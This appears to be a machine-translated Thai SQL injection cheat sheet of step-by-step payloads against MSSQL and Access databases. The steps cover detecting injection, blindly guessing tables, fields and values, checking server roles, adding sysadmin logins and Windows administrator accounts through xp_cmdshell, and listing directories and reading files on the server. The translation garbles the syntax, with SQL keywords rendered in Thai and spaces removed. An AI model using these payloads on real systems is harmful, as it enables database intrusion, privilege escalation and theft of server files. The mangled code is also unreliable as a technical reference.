1. ตรวจสอบว่ามีการฉีดหรือไม่
; และ 1 = 1
; และ 1 = 2
2. การตัดสินเบื้องต้นว่าเป็น MSSQL หรือไม่
; Anduser> 0
3. พารามิเตอร์การฉีดเป็นอักขระ
'และ [เงื่อนไขการสืบค้น] และ' '='
4. ไม่มีพารามิเตอร์การกรองระหว่างการค้นหา
'และ [เงื่อนไขการสืบค้น] และ'%25 '='
5. ระบบฐานข้อมูล
; และ (selectCount (*) จาก SYSOBECTS)> 0MSSQL
; และ (selectCount (*) frommSySoBjects)> 0Access
6. เดาฐานข้อมูล
; และ (selectCount (*) จาก [ชื่อฐานข้อมูล])> 0
7. เดาสนาม
; และ (selectCount (ชื่อฟิลด์) จากชื่อฐานข้อมูล)> 0
8. เดาความยาวบันทึกในสนาม
; และ (selecttop1len (ชื่อฟิลด์) จากชื่อฐานข้อมูล)> 0
9. (1) เดาค่า ASCII ของฟิลด์ (เข้าถึง)
; และ (selecttop1asc (mid (ชื่อฟิลด์, 1, 1)) จากชื่อฐานข้อมูล)> 0
(2) เดาค่า ASCII ของฟิลด์ (MSSQL)
; และ (selecttop1unicode (substring (ชื่อฟิลด์, 1, 1)) จากชื่อฐานข้อมูล)> 0
10. โครงสร้างการอนุญาตทดสอบ (MSSQL)
; และ 1 = (selectis_srvrolemember ('sysadmin'));-
; และ 1 = (selectis_srvrolemember ('serveradmin'));-
; และ 1 = (selectis_srvrolemember ('setupadmin'));-
; และ 1 = (selectis_srvrolemember ('SecurityAdmin'));-
; และ 1 = (selectis_srvrolemember ('diskadmin'));-
; และ 1 = (selectis_srvrolemember ('bulkadmin'));-
; และ 1 = (selectis_member ('db_owner'));-
11. เพิ่ม MSSQL และบัญชีระบบ
; execmaster.dbo.sp_addloginusername;-
; execmaster.dbo.sp_passwordnull, ชื่อผู้ใช้, รหัสผ่าน;-
; execmaster.dbo.sp_addsrvrolemembersysadminusername;-
; Execmaster.dbo.xp_cmdshell'NetuserUserNamePassword/Workstations:*/Times: All/PasswordChg: ใช่/passwordReq: ใช่/active: ใช่/เพิ่ม ';-
; Execmaster.dbo.xp_cmdshell'NetuserUserNamePassword/เพิ่ม ';-
; Execmaster.dbo.xp_cmdshell'NetLocalGroupAdMinistratorsUserName/Add ';-
12. (1) ถ่ายโอนไดเรกทอรี
; createTeabledirs (pathsvarchar (100), Idint)
; InsertDirSexecmaster.dbo.xp_dirtree'c:/'
; และ (SelectTop1PathsFromDirs)> 0
; และ (SelectTop1PathsFromDirswherePathsnotin ('เส้นทางที่ได้จากขั้นตอนก่อนหน้า')>)
(2) สำรวจไดเรกทอรี
; createTableTemp (Idnvarchar (255), num1nvarchar (255), num2nvarchar (255), num3nvarchar (255));--
; InsertTempExecMaster.dbo.xp_availableMedia;-รับไดรฟ์ปัจจุบันทั้งหมด
; InsertIntotemp (ID) Execmaster.dbo.xp_subdirs'c:/';-รับรายการไดเรกทอรีย่อย
; InsertIntotemp (ID, NUM1) Execmaster.dbo.xp_dirtree'c:/';-รับโครงสร้างต้นไม้ไดเรกทอรีของไดเรกทอรีย่อยทั้งหมด
; InsertIntotemp (ID) Execmaster.dbo.xp_cmdshell'typec: /web/index.asp ';-ดูเนื้อหาของไฟล์
